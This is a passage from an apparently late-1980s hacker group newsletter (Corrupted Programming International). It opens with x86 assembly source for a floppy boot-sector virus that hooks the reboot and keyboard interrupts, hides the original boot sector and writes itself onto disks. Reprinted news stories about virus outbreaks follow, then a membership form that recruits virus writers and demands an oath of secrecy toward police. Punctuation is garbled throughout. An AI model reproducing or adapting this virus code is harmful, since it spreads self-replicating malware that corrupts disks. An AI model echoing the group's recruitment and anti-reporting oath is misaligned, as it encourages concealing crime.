MOV BH,DH ; PAGE 0
|
||
INT 10H ;
|
||
;
|
||
MOV AH,1 ;SET CURSOR TYPE
|
||
MOV CX,0607H ;
|
||
INT 10H ;
|
||
;
|
||
MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW)
|
||
CALL DELAY ;
|
||
;
|
||
CLI ;
|
||
OUT 20H,AL ;SEND EOI TO INT CONTROLLER
|
||
;
|
||
MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
|
||
MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!)
|
||
MOV SI,offset BEGIN - 128 ;
|
||
MOV CX,128 ;
|
||
CLD ;
|
||
REP MOVSB ;
|
||
;
|
||
MOV DS,CX ;CX=0 ;DS=0
|
||
;
|
||
MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
|
||
MOV [(19H*4)+2],CS ;
|
||
;
|
||
MOV AX,0040H ;DS = ROM DATA AREA
|
||
MOV DS,AX ;
|
||
;
|
||
MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0
|
||
INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)
|
||
;
|
||
PUSH DS ;IF BIOS F000:E502 == 21E4...
|
||
MOV AX,0F000H ;
|
||
MOV DS,AX ;
|
||
CMP Word Ptr [0E502H],21E4H ;
|
||
POP DS ;
|
||
JE R_90 ;
|
||
INT 19H ; IF NOT...REBOOT
|
||
;
|
||
R_90: JMP 0F000:0E502H ;...DO IT ?!?!?!
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; REBOOT INT VECTOR ;
|
||
;-----------------------------------------------------------------------;
|
||
NEW_19: XOR AX,AX ;
|
||
;
|
||
MOV DS,AX ;DS=0
|
||
MOV AX,[0410] ;AX=EQUIP FLAG
|
||
TEST AL,1 ;IF FLOPPY DRIVES ...
|
||
JNZ N19_20 ;...JUMP
|
||
N19_10: PUSH CS ;ELSE ES=CS
|
||
POP ES ;
|
||
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
|
||
INT 18H ;LOAD BASIC
|
||
;
|
||
N19_20: MOV CX,0004 ;RETRY COUNT = 4
|
||
;
|
||
N19_22: PUSH CX ;
|
||
MOV AH,00 ;RESET DISK
|
||
INT 13 ;
|
||
JB N19_81 ;
|
||
MOV AX,0201 ;READ BOOT SECTOR
|
||
PUSH DS ;
|
||
POP ES ;
|
||
MOV BX,offset BEGIN ;
|
||
MOV CX,1 ;TRACK 0, SECTOR 1
|
||
INT 13H ;
|
||
N19_81: POP CX ;
|
||
JNB N19_90 ;
|
||
LOOP N19_22 ;
|
||
JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; Reinfection segment. ;
|
||
;-----------------------------------------------------------------------;
|
||
N19_90: CMP DI,3456 ;IF NOT FLAG SET...
|
||
JNZ RE_INFECT ;...RE INFECT
|
||
;
|
||
JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR
|
||
JMP 0000:7C00H ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; Reinfection Segment. ;
|
||
;-----------------------------------------------------------------------;
|
||
RE_INFECT: ;
|
||
MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH
|
||
MOV CX,00E6H ; OURSELF
|
||
MOV DI,SI ;
|
||
PUSH CS ;
|
||
POP ES ;
|
||
CLD ;
|
||
REPE CMPSB ;
|
||
JE RI_12 ;IF NOT EQUAL...
|
||
;
|
||
INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
|
||
;
|
||
;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;
|
||
MOV BX,offset TABLE ;FORMAT INFO
|
||
MOV DX,0000 ;DRIVE A: HEAD 0
|
||
MOV CH,40-1 ;TRACK 39
|
||
MOV AH,5 ;FORMAT
|
||
JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW !
|
||
;
|
||
; <<< NO EXECUTION PATH TO HERE >>> ;
|
||
JB RI_80 ;
|
||
;
|
||
;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
|
||
RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0
|
||
MOV BX,offset BEGIN ;TRACK 40H
|
||
MOV CL,8 ;SECTOR 8
|
||
MOV AX,0301H ;WRITE 1 SECTOR
|
||
INT 13H ;
|
||
;
|
||
PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW)
|
||
POP ES ;
|
||
JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE
|
||
;
|
||
MOV CX,0001 ;WRITE INFECTED BOOT SECTOR !
|
||
MOV AX,0301 ;
|
||
INT 13H ;
|
||
JB RI_80 ; IF ERROR...JUMP TO BOOT CODE
|
||
;
|
||
RI_12: MOV DI,3456H ;SET oJUST INFECTED ANOTHER ONE@...
|
||
INT 19H ;...FLAG AND REBOOT
|
||
;
|
||
RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
|
||
DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT)
|
||
JMP JMP_BOOT ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; ;
|
||
;-----------------------------------------------------------------------;
|
||
N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS
|
||
;
|
||
MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG
|
||
MOV BX,0040H ;
|
||
MOV DS,BX ;
|
||
MOV [0072H],AX ; 0040:0072 = RESET FLAG
|
||
JMP N09_90 ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; DELAY ;
|
||
; ;
|
||
; ON ENTRY AH:CX = LOOP COUNT ;
|
||
;-----------------------------------------------------------------------;
|
||
DELAY: SUB CX,CX ;
|
||
D_01: LOOP $ ;
|
||
SUB AH,1 ;
|
||
JNZ D_01 ;
|
||
RET ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; ;
|
||
;-----------------------------------------------------------------------;
|
||
A7DF4 DB 27H,00H,8,2
|
||
|
||
COUNTER_1 DW 001CH
|
||
ALT_CTRL DW 0
|
||
A7DFC DB 27H,0,8,2
|
||
|
||
|
||
Subject: CPI Issue 2 10/11
|
||
To: tk0jut2
|
||
Original_To: BITNET%"tk0jut2@niu"
|
||
|
||
|
||
[2.10]
|
||
|
||
Virili In The News
|
||
------------------
|
||
This section deals with a large amount of stuff, basically, a bunch
|
||
of viruses and stuff that have been in the newspapers and magazines cuz
|
||
all of the damage they have done. Enjoy....
|
||
|
||
|
||
ThereYs A Virus In My Software
|
||
|
||
Mischief-makers at the computer
|
||
are deliberately endangering data
|
||
|
||
By Philip J. Hilts
|
||
|
||
Washington Post Staff Writer
|
||
|
||
The Washington Post Weekly Edition, Page #38. May 23-29, 1988.
|
||
|
||
Tiny programs that are deliberately cause mischief are epidemic among
|
||
computers and causing nervousness among those who monitor them. Since the
|
||
first tests of the notion in 1983 that machines can catch and spread
|
||
oinformation diseases,@ the computer world has reached the point at which as
|
||
many as thirty instances of ocomputer virus@ have been reported in the past
|
||
year, affecting tens of thousands of U.S. computers alone.
|
||
|
||
Such viruses have been found at the National Aeronautics and Space
|
||
Administration, International Business Machines Corporation, the House of
|
||
Representatives, at least six universities, several major computer networks
|
||
such as Comp-u-serve and several businesses, including the worldYs largest
|
||
computer-service company, the $4.4 billion Electronic Data Systems
|
||
Corporation of Dallas, Texas.
|
||
|
||
Written by malicious programmers, the viruses are sneaked into computer
|
||
systems by piggybacking them on legitimate programs and messages. There,
|
||
they may be passed along or instructed to wait until a prearranged moment to
|
||
burst forth and destroy data.
|
||
|
||
Hundreds of computers at the Hebrew University of Jerusalem and other
|
||
places in Israel were hit last fall by a virus designed to spread and then,
|
||
in one swipe on a Friday the thirteenth, destroy all data in any computer it
|
||
could reach.
|
||
|
||
If not for an error by itYs author, who has not been caught, the virus
|
||
could have caused devastation among micro-computers in Israel and other
|
||
nations. The virus did not check to see whether it already had infected a
|
||
program and so infected some computers hundreds of times, crowding their
|
||
memories enough to call attention to itself.
|
||
|
||
In a seven-month campaign, programmers in Israel hastened to find
|
||
infected machines and ensure that the smallest number would be affected
|
||
before Friday, May 13th. Officials say they initially thought that the
|
||
infection was connected with the anniversary of the last day that Palestine
|
||
existed as a political entity but subsequently decided that it most likely
|
||
involved just Friday the thirteenth.
|
||
|
||
Apparently, the campaign was successful; there has been no word of
|
||
substantial damage. This past Friday the thirteenth is this yearYs only such
|
||
day.
|
||
|
||
At the Aldus Corporation of Seattle, Washington, a major software maker,
|
||
executives are huddling with lawyers to try to determine whether
|
||
international spread of such diseases is illegal. No virus cases have been
|
||
taken to court.
|
||
|
||
At N.A.S.A. headquarters in Washington, several hundred computers had to
|
||
be resuscitated after being infected. N.A.S.A. officials have taken
|
||
precautions and reminded their machinesY users to follow routine computer
|
||
hygiene: DonYt trust foreign data or strange machines.
|
||
|
||
Viruses have the eerie ability to perch disguised among legitimate data
|
||
just as biological viruses hide among genes in human cells, then spring out
|
||
unexpectedly, multiplying and causing damage. Experts say that even when
|
||
they try to study viruses in controlled conditions, the programs can get out
|
||
of control and erase everything in a computer. The viruses can be virtually
|
||
impossible to stop if their creators are determined enough.
|
||
|
||
oThe only way to protect every-body from them is to do something much
|
||
worse than the viruses: Stop talking to one another with computers,@ says
|
||
William H. Murray, an information-security specialist at Ernst and Whinney
|
||
financial consultants in Hartford, Connecticut.
|
||
|
||
Hundreds of programs and files have been destroyed by viruses, and
|
||
thousands of hours of repair or prevention time have been logged.
|
||
Programmers have quickly produced antidote programs with such titles as
|
||
oVaccine,@ oFlu Shot,@ oData Physician,@ oSyringe.@
|
||
|
||
Experts says known damage is minimal compared with the huge, destructive
|
||
potential. They express the hope that the attacks will persuade computer
|
||
users to minimize access to programming and data.
|
||
|
||
oWhat we are dealing with here is the fabric of trust in society,@ says
|
||
Murray. oWith computer viruses, we have a big vulnerability.@
|
||
|
||
Early this year, Aldus Corporation discovered that a virus had been
|
||
introduced that infected at least five-thousand copies of a new drawing
|
||
program called Freehand for the Macintosh computer. The infected copies were
|
||
packaged, sent to stores and sold. On March 2, the virus interrupted users
|
||
by flashing this message on their screens:
|
||
|
||
oRichard Brandow, publisher of MacMag, and its entire staff would like
|
||
to take this opportunity to convey their universal message of peace to all
|
||
Macintosh users around the world.@
|
||
|
||
Viruses are the newest of evolving methods of computer mayhem, says
|
||
Donn B. Parker, a consultant at SRI International, a computer research firm
|
||
in Menlo Park, California. One is the oTrojan horse,@ a program that looks
|
||
and acts like a normal program but contains hidden commands that eventually
|
||
take effect, ordering mischief. Others include the otime bomb,@ which
|
||
explodes at a set time, and the ologic bomb,@ which goes off when the
|
||
computer arrives at a certain result during normal computation. The osalami
|
||
attack@ executes barely noticeable results small acts, such as shaving a
|
||
penny from thousands of accounts.
|
||
|
||
The computer virus has the capability to command the computer to make
|
||
copies of the virus and spread them. A virus typically is written only as a
|
||
few hundred characters in a program containing tens of thousands of
|
||
characters. When the computer reads legitimate instructions, it encounters
|
||
the virus, which instructs the computer to suspend normal operations for a
|
||
fraction of a second.
|
||
|
||
During that time, the virus instructs the computer to check for other
|
||
copies of itself and, if none is found, to make and hide copies. Instruction
|
||
to commit damage may be included. A few infamous viruses found in the past
|
||
year include:
|
||
|
||
[] The oscores@ virus. Named after a file it spawns, it recently entered
|
||
several hundred Macintosh computers at N.A.S.A. headquarters. oIt looks
|
||
as if it searching for a particular Macintosh program with a name that
|
||
no one recognizes,@ spokesman Charles Redmond says.
|
||
|
||
This virus, still spreading, has reached computers in CongressY
|
||
information system at the National Oceanic and Atmospheric
|
||
Administration and at Apple Computer IncorporatedYs government-systems
|
||
office in Reston, Virginia. It has hit individuals, businesses and
|
||
computer obulletin boards@ where computer hobbyists share information.
|
||
It apparently originated in Dallas, Texas and has caused damage, but
|
||
seemingly only because of its clumsiness, not an instruction to do
|
||
damage.
|
||
|
||
[] The obrain@ virus. Named by its authors, it was written by two brothers
|
||
in a computer store in Lahore, Pakistan, who put their names, addresses
|
||
and phone number in the virus. Like oscores,@ it has caused damage
|
||
inadvertently, ordering the computer to copy itself into space that
|
||
already contain information.
|
||
|
||
[] The oChristmas@ virus. It struck last December after a West German
|
||
student sent friends a Christmas message through a local computer
|
||
network. The virus told the receiverYs computer to display the
|
||
greeting, then secretly send the virus and message to everyone on the
|
||
recipientYs regular electronic mailing list.
|
||
|
||
The student apparently had no idea that someone on the list had
|
||
special, restricted access to a major world-wide network of several
|
||
thousand computers run by I.B.M. The network broke down within hours
|
||
when the message began multiplying, stuffing the computersY memories.
|
||
No permanent damage was done, and I.B.M. says it has made repetition
|
||
impossible.
|
||
|
||
Demonstrations have shown that viruses can invade the screens of users
|
||
with the highest security classification, according to Fred Cohen of
|
||
Cincinnati, a researcher who coined the term ocomputer Viruses.@ A standard
|
||
computer-protection device at intelligence agencies, he says, denies giving
|
||
access by a person at one security level to files of anyone else at a higher
|
||
level and allows reading but denies writing of files of anyone lower.
|
||
|
||
This, however, oallows the least trusted user to write a program that
|
||
can be used by everyone@ and is overy dangerous,@ he says.
|
||
|
||
Computers oare all at risk,@ says Cohen, oand will continue to be... not
|
||
just from computer viruses. But the viruses represent a new level of threat
|
||
because of their subtleness and persistence.@
|
||
|
||
|
||
1.) Computer oviruses@ are actually immature computer programs. Most are
|
||
written by malicious programmers intent on destroying information in
|
||
computers for fun.
|
||
|
||
2.) Those who write virus programs often conceal them on floppy disks that
|
||
are inserted in the computer. The disks contain all programs needed to
|
||
run the machine, such as word processing programs, drawing programs or
|
||
spread sheet programs.
|
||
|
||
3.) A malicious programmer makes the disk available to others, saying it
|
||
contains a useful program or game. These programs can be lent to others
|
||
or put onto computerized: obulletin boards@ where anyone can copy them
|
||
for personal use.
|
||
|
||
4.) A computer receiving the programs will oread@ the disk and the tiny virus
|
||
program at the same time. The virus may then order the computer to do a
|
||
number of things:
|
||
|
||
A.) Tell it to read the virus and follow instructions.
|
||
|
||
B.) Tell it to make a copy of the virus and place it on any disk inserted
|
||
in the machine today.
|
||
|
||
C.) Tell it to check the computerYs clock, and on a certain date destroy
|
||
information that tells it where data is stored on any disk: if an
|
||
operator has no way of retrieving information, it is destroyed.
|
||
|
||
D.) Tell it not to list the virus programs when the computer is asked for
|
||
an index of programs.
|
||
|
||
5.) In this way, the computer will copy the virus onto many disks--perhaps
|
||
all or nearly all the disks used in the infected machine. The virus may
|
||
also be passed over the telephone, when one computer sends or receives
|
||
data from another.
|
||
|
||
6.) Ultimately hundreds or thousands of people may have infected disks and
|
||
potential time bombs in their systems.
|
||
|
||
|
||
-----------------------------------------------
|
||
ZVirusY infected hospital computers,
|
||
led to epidemic of software mix-ups
|
||
-----------------------------------------------
|
||
From the San Diego Tribune
|
||
March 23, 1989
|
||
|
||
|
||
BOSTON (UPI) -- A ovirus@ infected computers at three Michigan hospitals
|
||
last fall and disrupted patient diagnoses at two of the centers in what appears
|
||
to be the first such invasion of a medical computer, it was reported yesterday.
|
||
|
||
The infiltration did not harm any patients but delayed diagnoses by
|
||
shutting down computers, creating files of non-existent patients and garbling
|
||
names on patient records, which could have caused more serious problems, a
|
||
doctor said.
|
||
|
||
oIt definitely did affect care in delaying things and it could have
|
||
affected care in terms of losing this information completely,@ said Dr. Jack
|
||
Juni, a staff physician at the William Beaumont Hospitals in Troy and Royal Oak,
|
||
Mich., two of the hospitals involved.
|
||
|
||
If patient information had been lost, the virus could have forced doctors
|
||
to repeat tests that involve exposing patients to radiation, Juni said
|
||
yesterday. The phony and garble files could have caused a mix-up in patient
|
||
diagnosis, he said.
|
||
|
||
oThis was information we were using to base diagnoses on,@ said Juni, who
|
||
reported the case in a letter in The New England Journal of Medicine. oWe were
|
||
lucky and caught it in time.@
|
||
|
||
A computer virus is a set of instructions designed to reproduce and spread
|
||
>from computer to computer. Some viruses do damage in the process, such as
|
||
destroying files or overloading computers.
|
||
|
||
Paul Pomes, a computer virus expert at the University of Illinois in
|
||
Champaign, said this was the first case he had heard of in which a virus had
|
||
disrupted a computer used for patient care or diagnosis in a hospital.
|
||
|
||
Such disruptions could become more common as personal computers are used
|
||
more widely in hospitals, Juni and Pomes said. More people know how to program
|
||
-- and therefore sabotage -- personal computers than the more specialized
|
||
computers that previously have been used, Pomes said.
|
||
|
||
The problem in Michigan surfaced when a computer used to display images
|
||
used to diagnose cancer and other diseases began to malfunction at the 250-bed
|
||
Troy hospital in August 1988.
|
||
|
||
In October, Juni discovered a virus in the computer in the Troy hospital.
|
||
The next day, Juni found the same virus in a similar computer in the 1,200-bed
|
||
Royal Oak facility, he said.
|
||
|
||
The virus apparently arrived in a program in a storage disk that was part
|
||
of the Troy computer system, he said. It probably was spread inadvertently to
|
||
the Royal Oak computer on a floppy disk used by a resident who worked at both
|
||
hospitals to write a research paper, he said.
|
||
|
||
The virus also spread to the desk-top computers at the University of
|
||
Michigan Medical Center in Ann Arbor, where it was discovered before it caused
|
||
problems.
|
||
|
||
|
||
oProsecutor Wins Conviction In Computer Data Destruction@
|
||
|
||
September 21, 1988
|
||
|
||
|
||
Fort Worth, Texas (AP) - A former programmer has been convicted of planting
|
||
a computer ovirus@ in his employerYs system that wiped out 168,000 records and
|
||
was activated like a timb bomb, doing its damage two days after he was fired.
|
||
|
||
Tarrant County Assistant District Attorney Davis McCown said he believes e
|
||
is the first prosecutor in the country to have someone convicted for destroying
|
||
computer records using a ovirus.@
|
||
|
||
oWeYve had people stealing through computers, but not this type of case,@
|
||
McCown said. oThe basis for this offense is deletion.@
|
||
|
||
oItYs very rare that the people who spread the viruses are caught,@ said
|
||
John McAfee, chairman of the Computer Virus Industry Association in Santa Clara,
|
||
which helps educate the public about viruses and find ways to fight them.
|
||
|
||
oThis is absolutely the first time@ for a conviction, McAfee said.
|
||
|
||
oIn the past, prosecutors have stayed away from this kind of case because
|
||
theyYre too hard to prove,@ McCown said yesterday. They have also been reluctant
|
||
because the victim doesnYt want to let anyone know there has been a breach of
|
||
security.@
|
||
|
||
Donald Gene Burleson, 40, was convicted of charges of harmful access to a
|
||
computer, a third-degree feloy that carries up to 10 years in prison and up to
|
||
$5,000 in fines.
|
||
|
||
A key to the case was the fact that State District Judge John Bradshaw
|
||
allowed the computer program that deleted the files to be introduced as
|
||
evidence, McCown said. It would have been difficult to get a conviction
|
||
otherwise, he said.
|
||
|
||
The District Court jury deliberated six hours before bringing back the
|
||
first conviction under the stateYs 3-year-old computer sabotage law.
|
||
|
||
Burleson planted the virus in revenge for his firing from an insurance
|
||
company, McCown said.
|
||
|
||
Jurors were told during a technical and sometimes-complicated three-week
|
||
trial that Burleson planted a rogue program in the computer system used to store
|
||
records at USPA and IRA Co., a Fort Worth-based insurance and brokerage firm.
|
||
|
||
A virus is a computer program, often hidden in apparently normal computer
|
||
software, that instructs the computer to change or destroy information at a
|
||
given time or after a certain sequence of commands.
|
||
|
||
The virus, McCown said, was activated Sept. 21, 1985, two days after
|
||
Burleson was fired as a computer programmer, because of alleged personality
|
||
conflicts with other employees.
|
||
|
||
oThere were a series of programs built into the system as early as Labor
|
||
Day (1985),@ McCown said. oOnce he got fired, those programs went off.@
|
||
|
||
The virus was discovered two days later, after it had eliminated 168,00
|
||
payroll records, holding up company paychecks for more than a month. The virus
|
||
could have caused hundreds of thousands of dollars in damage to the system had
|
||
it continued, McCown said.
|
||
|
||
|
||
Subject: CPI Issue 2 11/11
|
||
To: tk0jut2
|
||
Original_To: BITNET%"tk0jut2@niu"
|
||
|
||
|
||
WEST COAST CORRUPTED ALLEGIANCE PRESENTS:
|
||
|
||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||
|
||
>> CORRUPTED PROGRAMMING INTERNATIONAL <<
|
||
>> MEMBERSHIP APPLICATION <<
|
||
|
||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||
(CPI is a sub-group of WCCA)
|
||
|
||
NOTE: The following information is of a totally confidential nature. We must
|
||
question you in depth and thouroughly so that our knowledge and idea
|
||
of you will be quite complete. Remember, it is the fate of our voting
|
||
members who will decide upon your membership, as the result of your
|
||
response to this questionarre. Please answer the following completely
|
||
and to the best of your ability. Also note that we may decide to voice
|
||
validate you or gather any other information through other sources and
|
||
will discover if you have placed false or misleading information on
|
||
this application.
|
||
|
||
|
||
PERSONAL INFORMATION:
|
||
-----------------------------------------------------------------------------
|
||
Alias(es) You HAVE Used :
|
||
Alias(es) You Currently Use :
|
||
Your FULL REAL Name :
|
||
Your Voice Phone Number :(###)###-####
|
||
Your Data Phone Number :(###)###-####
|
||
Your Mailing Address :
|
||
Your City, State & Zip :
|
||
Your Age :
|
||
Occupation/Grade :
|
||
Place of Employment/School :
|
||
Work Phone Number :
|
||
Your Interests And Hobbies :
|
||
|
||
Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency?
|
||
If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN)
|
||
:
|
||
:
|
||
|
||
Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone,
|
||
Data, Or Long Distance Type Of Company? If So, In What Way?
|
||
:
|
||
:
|
||
|
||
|
||
COMPUTER INFORMATION/EXPERIENCE
|
||
-----------------------------------------------------------------------------
|
||
Computer Experience (time) :
|
||
Modeming Experience (time) :
|
||
BBSYs You Frequent (Name/#) :
|
||
Some Elite References :
|
||
Computers You Have Used :
|
||
Computer(s) You Are Using :
|
||
Computer You Prefer :
|
||
Languages You Have Tried :
|
||
Languages You Know Well :
|
||
Your Best Language :
|
||
Have You Ever Phreaked :
|
||
Do You Phreak Regularly :
|
||
Have You Ever Hacked :
|
||
Do You Hack Regularly :
|
||
Have You Ever Cracked :
|
||
Do You Crack Regularly :
|
||
Ever Made A Virus/Trojan :
|
||
Major Accomplishments :
|
||
:
|
||
|
||
INTERVIEW
|
||
-----------------------------------------------------------------------------
|
||
Answer In 4 Lines Or Less:
|
||
|
||
What do you think Corrupted Programming International is?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
When did you first hear about CPI?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Why do you want to be a member of CPI?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Do you know any of the members of CPI? Can you name any or the founders of CPI?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Have you considered the distribuition of Viruses/Trojans as a ocrime@? Why
|
||
or why not? Have you ever considered the consequences that could result
|
||
>from the acts of releasing a Virus/Trojan? (morally speaking?)
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Have you written any text files? (On any underground type of subject)
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Are you a member of any other group(s)? Can you name them and their HQ BBS?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
What would you consider yourself if you were admitted into CPI, a programmer,
|
||
a phreaker, a distributor, a information gatherer, or a vegetable?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Why would you ever want to release or aid in releasing a potential virus/trojan
|
||
to the public?
|
||
:
|
||
:
|
||
:
|
||
:
|
||
|
||
Can you contribute to CPI? How?
|
||
:(do you have access to info concerning virus/trojans)
|
||
:(exceptional programmer?)
|
||
:(got connections?)
|
||
:(anything extraordinary?)
|
||
|
||
|
||
OATH
|
||
-----------------------------------------------------------------------------
|
||
Typing your name at the bottom of the following paragraph is the same as
|
||
signing your name on an official document.
|
||
|
||
authorities - As stated in the document below, the term authorities shall
|
||
be defined as any law enforcement agency or any agency that
|
||
is/may be affiliated with any law enforcement agency. Also,
|
||
this includes any company or agency or person which is/may
|
||
be involved with the telephone company or any telephone-type
|
||
of service(s).
|
||
|
||
I [your name here] do solemnly swear never to report neither to my peers nor
|
||
the authorities the actions and duties performed by this group, Corrupted
|
||
Programming International, on any account. Also, I realize that if I leave
|
||
CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold
|
||
the greatest confidence of CPIYs activities, and I agree that any information I
|
||
may report to any one or any thing CANNOT be used against CPI and its members
|
||
in a court of law. I fully understand that if I were to become affiliated with
|
||
the authorities that it would be my duty to remove myself from any membership
|
||
if my position presented itself as contradictory towards the group, CPI and its
|
||
members. I also comprehend that if I were to be confronted by the authorities,
|
||
it my duty as a CPI member, as signed below, is to never disclose or discuss
|
||
CPIYs activities to them; however, if I do, I fully agree that the information
|
||
disclosed or discussed cannot then be used against CPI or any member(s) of CPI
|
||
in a court of law. I further agree that all the terms and restrictions as noted
|
||
above also correspond to the entire group of WCCA, West Coast Corrupted
|
||
Allegiance.
|
||
|
||
Typed:____________________
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
.Answer Each Question To The Best And Fullest Of Your Ability.
|
||
-----------------------------------------------------------------------------
|
||
|
||
Upload ALL Applications To The WCCA Headquarters BBS
|
||
|
||
T H E A N D R O M E D A S T R A I N
|
||
|
||
* 619-566-7093 * 1200/2400 * 24 HRS *
|
||
|
||
|
||
_______________________<==| CURRENT WCCA NODES |==>_________________________
|
||
/--------------+------------------------------------+-----------------+------\
|
||
| Phone Number | Node Name | Sysop | Baud |
|
||
+--------------+------------------------------------+-----------------+------+
|
||
| 619-484-3508 | The Phrozen Phorest | Ancient Mariner | 1200 |
|
||
\--------------+------------------------------------+-----------------+------/
|
||
|
||
Future WCCA Support BBSYs Will Be Active - Applications May Be Turned In Then
|